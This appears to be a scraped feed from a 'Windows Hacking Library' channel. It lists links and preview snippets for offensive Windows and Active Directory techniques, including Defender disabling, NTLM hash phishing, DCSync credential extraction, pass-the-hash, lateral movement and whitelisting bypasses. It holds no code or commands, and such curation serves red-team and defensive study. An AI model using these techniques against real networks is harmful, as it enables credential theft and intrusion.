PSScriptAnalyzer is a static code checker for Windows PowerShell modules and scripts. PSScriptAnalyzer checks the quality of Windows PowerShell code by running a set of rules. The rules are based on PowerShell best practices identified by PowerShell Team and the community. It generates DiagnosticResults (errors and warnings) to inform users about potential code defects and suggests possible solutions for improvements.
https://github.com/PowerShell/PSScriptAnalyzer
@WindowsHackingLibrary
https://github.com/PowerShell/PSScriptAnalyzer
@WindowsHackingLibrary
GitHub
GitHub - PowerShell/PSScriptAnalyzer: Download ScriptAnalyzer from PowerShellGallery
Download ScriptAnalyzer from PowerShellGallery. Contribute to PowerShell/PSScriptAnalyzer development by creating an account on GitHub.
Bypassing SQL Server Logon Trigger Restrictions
https://blog.netspi.com/bypass-sql-logon-triggers/
@WindowsHackingLibrary
https://blog.netspi.com/bypass-sql-logon-triggers/
@WindowsHackingLibrary
NetSPI Blog
Bypassing SQL Server Logon Trigger Restrictions
This shows how to bypass SQL Server logon trigger restrictions by spoofing hostnames and application names using lesser known connection string properties.
Spoof SSDP replies to phish for NTLM hashes on a network. Creates a fake UPNP device, tricking users into visiting a malicious phishing page.
https://gitlab.com/initstring/evil-ssdp
@WindowsHackingLibrary
https://gitlab.com/initstring/evil-ssdp
@WindowsHackingLibrary
GitLab
initstring / evil-ssdp · GitLab
Spoof SSDP replies to phish for credentials and NetNTLM challenge/response. Creates a fake UPNP device, tricking users into visiting a malicious phishing page. Also detects and exploits XXE...
Incapacitating Windows Defender
http://www.offensiveops.io/tools/incapacitating-windows-defender/
@WindowsHackingLibrary
http://www.offensiveops.io/tools/incapacitating-windows-defender/
@WindowsHackingLibrary
Red Team Tales 0x01: From MSSQL to RCE
https://www.tarlogic.com/en/blog/red-team-tales-0x01
@WindowsHackingLibrary
https://www.tarlogic.com/en/blog/red-team-tales-0x01
@WindowsHackingLibrary
Tarlogic Security - Cyber Security and Ethical hacking
Red Team Tales 0x01: From MSSQL to RCE
Introduction
In a Red Team operation, a perimeter asset vulnerable to SQL Injection was identified. Through this vulnerability it was possible to execute commands on the server, requiring an unusual tactic to achieve the exfiltration of the output of the…
In a Red Team operation, a perimeter asset vulnerable to SQL Injection was identified. Through this vulnerability it was possible to execute commands on the server, requiring an unusual tactic to achieve the exfiltration of the output of the…
LethalHTA - A new lateral movement technique using DCOM and HTA
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
@WindowsHackingLibrary
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
@WindowsHackingLibrary
Blogspot
CODE WHITE | Blog: LethalHTA - A new lateral movement technique using DCOM and HTA
The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research on this t...
What is it that Makes a Microsoft Executable a Microsoft Executable? An Attacker’s and a Defender’s Perspective
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
@WindowsHackingLibrary
@BlueTeamLibrary
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
@WindowsHackingLibrary
@BlueTeamLibrary
Medium
What is it that Makes a Microsoft Executable a Microsoft Executable?
What exactly is it that separates arbitrary code from code that originates from Microsoft? I would wager that the reaction of most people…
Powershell script to Enumerate executables with auto-elevation enabled, handy for privilege escalation purposes.
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
@WindowsHackingLibrary
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
@WindowsHackingLibrary
Gist
Enumerate executables with auto-elevation enabled
Enumerate executables with auto-elevation enabled. GitHub Gist: instantly share code, notes, and snippets.
Using a SCF File to gather Hashes
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
@WindowsHackingLibrary
https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
@WindowsHackingLibrary
1337red
Using a SCF file to Gather Hashes
Have you ever been on a internal network assessment and discovered an unauthenticated writable Windows-based file share? Well, in addition to finding potentially sensitive information, you can abus…
A Guide to Attacking Domain Trusts
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
@WindowsHackingLibrary
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
@WindowsHackingLibrary
RE: Evading Autoruns PoCs on Windows 10
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
@WindowsHackingLibrary
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
@WindowsHackingLibrary
Medium
RE: Evading Autoruns PoCs on Windows 10
Last September, Chris Bisnett and I presented research at DerbyCon which highlighted a handful of techniques and bugs we discovered that…
Feature, not bug: DNSAdmin to DC compromise in one line
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
@WindowsHackingLibrary
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
@WindowsHackingLibrary
Medium
Feature, not bug: DNSAdmin to DC compromise in one line
Background
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
https://blog.netspi.com/exploiting-adidns
@WindowsHackingLibrary
https://blog.netspi.com/exploiting-adidns
@WindowsHackingLibrary
NetSPI
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
Exploiting weaknesses in name resolution protocols is a common technique for performing man-in-the-middle (MITM) attacks. This blog dives into two particularly vulnerable name resolution protocols: Link-Local Multicast Name Resolution (LLMNR) and NetBIOS…
w0rk3r's Windows Hacking Library
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS https://blog.netspi.com/exploiting-adidns @WindowsHackingLibrary
GitHub
Powermad/README.md at master · Kevin-Robertson/Powermad
PowerShell MachineAccountQuota and DNS exploit tools - Powermad/README.md at master · Kevin-Robertson/Powermad
Domain Access With Write Access on the Domain NC Head
https://sdmsoftware.com/group-policy-blog/security-policy/elevating-ad-domain-access-with-write-access-on-the-domain-nc-head
@WindowsHackingLibrary
https://sdmsoftware.com/group-policy-blog/security-policy/elevating-ad-domain-access-with-write-access-on-the-domain-nc-head
@WindowsHackingLibrary
SDM Software
Elevating AD Domain Access With Write Access on the Domain NC Head - SDM Software
With this post and my last post, I guess I'm on a path of finding interesting ways to "break" AD. The last post related to AD denial of service and this Write access to the Domain object could allow domain admin access.
Extracting User Password Data with Mimikatz DCSync
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
@WindowsHackingLibrary
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
@WindowsHackingLibrary
Stealthbits Technologies
Extracting User Password Data with Mimikatz DCSync
Using the Mimikatz DCSync command to compromise credentials by replicating information with Directory Replication Service Remote Protocol MS-DRSR.
Passing-the-Hash to NTLM Authenticated Web Applications
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
@WindowsHackingLibrary
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
@WindowsHackingLibrary
Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
@WindowsHackingLibrary
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
@WindowsHackingLibrary
Medium
Application Whitelisting Bypass and Arbitrary Unsigned Code Execution Technique in winrm.vbs
Bypass Technique Description
Veil Payloads and Veil-Ordnance
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
@WindowsHackingLibrary
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
@WindowsHackingLibrary
FortyNorth Security Blog
Explaining Veil Payloads and Invoking Veil-Ordnance
In order to effectively use cyber security tools we need to know, in detail, how they work. Only then we are able to leverage them to the best of their capabilities. In this post we will dive into Veil-Evasion and learn its payload naming scheme, different…